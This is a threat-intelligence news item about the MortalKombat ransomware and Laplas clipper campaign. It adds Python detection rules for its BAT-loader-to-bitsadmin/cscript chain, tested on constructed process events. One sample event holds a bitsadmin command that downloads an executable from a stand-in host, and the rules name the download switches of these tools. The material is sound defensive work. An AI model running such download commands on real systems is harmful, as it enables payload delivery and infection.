‘MortalKombat’ Ransomware Emerges
Category: Ransomware News | Industry: Global | Level: Tactical | Source: Cisco Talos
Cybercriminals have launched a new financially motivated ransomware campaign using the ‘MortalKombat’ ransomware strain. The threat actors also deploy a Go variant of the Laplas clipper malware, which monitors the Windows clipboard for cryptocurrency wallet addresses and replaces them with the attacker's address to siphon funds. Cisco Talos reports that the threat actors obtained initial access through exposed RDP ports or through phishing campaigns themed as failed cryptocurrency transactions. The phishing email carries a malicious BAT loader script that uses LOLBins (living-off-the-land binaries) such as bitsadmin and cscript to download either the Laplas clipper or the MortalKombat ransomware.
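The loader chain described above (a BAT script launched from a user-writable path that in turn runs bitsadmin or cscript/wscript) is visible in process-creation telemetry. The following detection logic is an added example written for this page; it is not Cisco Talos or Anvilogic code. The events, paths and URL are constructed samples shaped like Sysmon Event ID 1 fields, not indicators from the report, and the rule names are hypothetical.

```python
"""Added example: flag the BAT loader -> LOLBin chain over constructed
process-creation events (parent image, image, command line)."""
import re

# Constructed sample events (hypothetical paths, hosts and URL; not real IoCs).
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Program Files\Outlook\OUTLOOK.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\alice\AppData\Local\Temp\invoice.bat"'},
    {"id": 2, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job /download /priority high "
                r"http://example.invalid/x.exe C:\Users\alice\AppData\Local\Temp\x.exe"},
    {"id": 3, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript.exe //nologo C:\Users\alice\AppData\Local\Temp\dl.vbs"},
    # Benign: script host used for a licensing query from the system directory.
    {"id": 4, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript.exe C:\Windows\System32\slmgr.vbs /dlv"},
    # Benign: bitsadmin listing jobs, no transfer requested.
    {"id": 5, "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /list"},
]

# Directories a phishing-delivered payload typically lands in.
USER_WRITABLE = re.compile(
    r"\\(AppData\\Local\\Temp|Downloads|Users\\Public|ProgramData)\\", re.I)
# bitsadmin switches that move a file onto the host.
BITS_DOWNLOAD = re.compile(r"/(transfer|download|addfile)\b", re.I)
SCRIPT_HOSTS = ("cscript.exe", "wscript.exe")


def _basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def rule_bat_loader_from_user_path(ev):
    """cmd.exe executing a .bat file from a user-writable directory."""
    return (_basename(ev["image"]) == "cmd.exe"
            and re.search(r"\.bat\b", ev["cmdline"], re.I) is not None
            and USER_WRITABLE.search(ev["cmdline"]) is not None)


def rule_bitsadmin_download(ev):
    """bitsadmin asked to transfer/download a file (the loader's fetch step)."""
    return (_basename(ev["image"]) == "bitsadmin.exe"
            and BITS_DOWNLOAD.search(ev["cmdline"]) is not None)


def rule_script_host_from_user_path(ev):
    """cscript/wscript running a script that lives in a user-writable path."""
    return (_basename(ev["image"]) in SCRIPT_HOSTS
            and USER_WRITABLE.search(ev["cmdline"]) is not None)


RULES = {
    "bat_loader_from_user_path": rule_bat_loader_from_user_path,
    "bitsadmin_download": rule_bitsadmin_download,
    "script_host_from_user_path": rule_script_host_from_user_path,
}


def run_rules(events):
    """Return (rule_name, event_id) pairs for every event a rule matches."""
    hits = []
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((name, ev["id"]))
    return hits


def loader_chain_present(events):
    """True when a BAT loader hit is followed by a LOLBin fetch/execute hit,
    i.e. the full chain from the report rather than an isolated event."""
    names = {name for name, _ in run_rules(events)}
    return ("bat_loader_from_user_path" in names
            and names & {"bitsadmin_download", "script_host_from_user_path"} != set())


if __name__ == "__main__":
    for name, ev_id in run_rules(SAMPLE_EVENTS):
        print(f"{name}: event {ev_id}")
    print("loader chain present:", loader_chain_present(SAMPLE_EVENTS))
```

The two benign events show why each rule is scoped: script hosts and bitsadmin are legitimate admin tools, so the rules key on the user-writable script location and the download switches rather than on the binary alone. In production the per-event hits would be correlated by host and process ancestry within a short window, which `loader_chain_present` only approximates.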
Cisco Talos discovered the MortalKombat ransomware in January 2023 and assesses it to be part of the Xorist ransomware family. Campaigns launched by MortalKombat operators have targeted individuals and businesses in the United States, United Kingdom, Turkey, and the Philippines. The MortalKombat encryptor does more damage than typical encryptors, since it encrypts system files and applications that other variants would have left untouched. As observed by Cisco Talos, "MortalKombat did not show any wiper behavior or delete the volume shadow copies on the victim’s machine. Still, it corrupts Windows Explorer, removes applications and folders from Windows startup, and disables the Run command window on the victim’s machine, making it inoperable."
Anvilogic Use Cases:
- Malicious File Delivering Malware
- Compressed File Execution
- Executable Create Script Process
- Wscript/Cscript Execution